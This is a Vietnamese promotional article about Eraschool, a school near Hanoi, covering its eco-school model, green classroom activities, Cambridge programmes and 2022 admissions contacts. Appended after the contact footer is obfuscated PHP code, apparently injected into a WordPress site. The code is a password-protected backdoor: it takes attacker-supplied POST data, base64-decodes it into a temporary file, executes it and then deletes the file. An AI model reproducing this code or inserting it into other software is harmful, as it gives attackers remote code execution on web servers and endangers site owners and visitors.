Eraschool – ngôi trường liên cấp có nhiều hoạt động xanh

post

Là ngôi trường liên cấp tổ chức nhiều hoạt động xanh ở mọi bậc học, Eraschool đã và đang nhận được sự quan tâm của rất nhiều phụ huynh yêu môi trường. Vậy mô hình này liệu có phải xu hướng mới hay không? Quy tắc tổ chức lớp học của Eraschool là gì? Ngoài các hoạt động xanh, Eraschool còn có điểm gì nổi bật đáng để ba mẹ lựa chọn? Mời ba mẹ cùng theo dõi bài viết dưới đây nhé! 

Mô hình trường học xanh, xu hướng hay tất yếu?

Học sinh được tham gia các hoạt động xanh tại Eraschool 
Học sinh được tham gia các hoạt động xanh tại Eraschool

Việc xây dựng các trường học theo mô hình trường học xanh đang trở thành chủ đề rất được quan tâm trong những năm gần đây. Vậy đây chỉ là xu hướng và sẽ sớm kết thúc, hay là tất yếu và sẽ không ngừng được đẩy mạnh phát triển trong thời gian tới? Câu trả lời nằm ở quan điểm của mỗi người. 

Trên thực tế, việc xây dựng các trường học nói chung, các trường liên cấp nói riêng theo mô hình này chỉ mới được đẩy mạnh trong vài năm gần đây. Tuy nhiên, có thể khẳng định hoạt động này mang tính tất yếu vì hai nguyên nhân chính sau đây: 

  • Con người đang ngày càng nhận ra sự quan trọng của thiên nhiên với cuộc sống. 

Những năm gần đây, khi biến đổi khí hậu tăng và những ảnh hưởng xấu của nó bắt đầu tác động trực tiếp tới cuộc sống thường ngày, vấn đề môi trường đã bắt đầu được nhiều người quan tâm hơn. Để bảo vệ môi trường và ứng phó với biến đổi khí hậu, chúng ta cần học về môi trường, tìm hiểu môi trường. Trong đó, không cách làm nào hiệu quả hơn việc giáo dục ngay từ khi trẻ còn nhỏ, thông qua việc cho trẻ tiếp xúc với thiên nhiên. 

  • Thiên nhiên là môi trường học tập lý tưởng của trẻ. 

Nhiều chuyên gia đã chứng minh việc học tập trong không gian mở có thể kích thích khả năng sáng tạo của trẻ. Ngoài ra, các lớp học được tổ chức gần gũi với thiên nhiên như tại trường liên cấp Eraschool cũng đóng góp vào việc khơi gợi hứng thú học tập, giúp trẻ không cảm thấy nhàm chán.

Quy tắc tổ chức lớp học ở trường sinh thái Eraschool

Tại Eraschool, trẻ được học từ thiên nhiên, học giữa thiên nhiên 
Tại Eraschool, trẻ được học từ thiên nhiên, học giữa thiên nhiên

Nhờ được xây dựng theo mô hình trường học sinh thái nên trường liên cấp Eraschool có quy tắc tổ chức lớp học rất khác với các trường công lập và tư thục khác. Ở Eraschool, mỗi lớp học đều được tổ chức theo nguyên tắc học từ thiên nhiên, học giữa thiên nhiên. Trẻ không chỉ được học kiến thức cần thiết cho các môn học trong chương trình mà còn được tham gia vào các hoạt động xanh trong trường học như trồng cây, quan sát rau mầm,… 

Những điểm nổi bật của trường Eraschool

Học sinh đang tham gia lớp học kỹ năng cứu người đuối nước 
Học sinh đang tham gia lớp học kỹ năng cứu người đuối nước

Bên cạnh các hoạt động xanh, trường sinh thái Eraschool còn gây ấn tượng bởi triết lý giáo dục hiện đại, phù hợp với xu hướng phát triển của thế giới: tự học – tự giáo dục và tự làm ra chính mình. Theo đó, trẻ được khuyến khích tự đọc, tự nghiên cứu và tìm hiểu kiến thức mới. Quá trình này không chỉ giúp các em ghi nhớ kiến thức tốt hơn mà còn rèn luyện thói quen chủ động tiếp cận tri thức – vốn vô cùng cần thiết trong thời đại cách mạng thông tin hiện nay. 

Không chỉ vậy, Eraschool còn là một trong số các trường đạt chuẩn để triển khai chương trình Cambridge Tiểu học và Trung học cơ sở. Vì vậy, học sinh tham gia 2 hệ đào tạo của nhà trường (hệ song ngữ và hệ quốc tế) sẽ có cơ hội tiếp cận với chương trình giáo dục chuẩn quốc tế, từ đó dễ thích nghi hơn với môi trường học tập và làm việc sau này. 

Trên đây là một số thông tin nổi bật về trường liên cấp Eraschool cũng như quy tắc tổ chức lớp học sáng tạo của nhà trường. Nếu ba mẹ muốn con được học tập trong môi trường mở gần gũi với thiên nhiên thì đừng bỏ qua cơ hội đăng ký cho con trong thời hạn tuyển sinh. Thông tin chi tiết về kỳ tuyển sinh năm 2022 hiện đã được đăng tải trên website của nhà trường, ba mẹ cũng có thể liên hệ trực tiếp tới hotline 0899.889.818 để được tư vấn trực tiếp và nhanh nhất! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}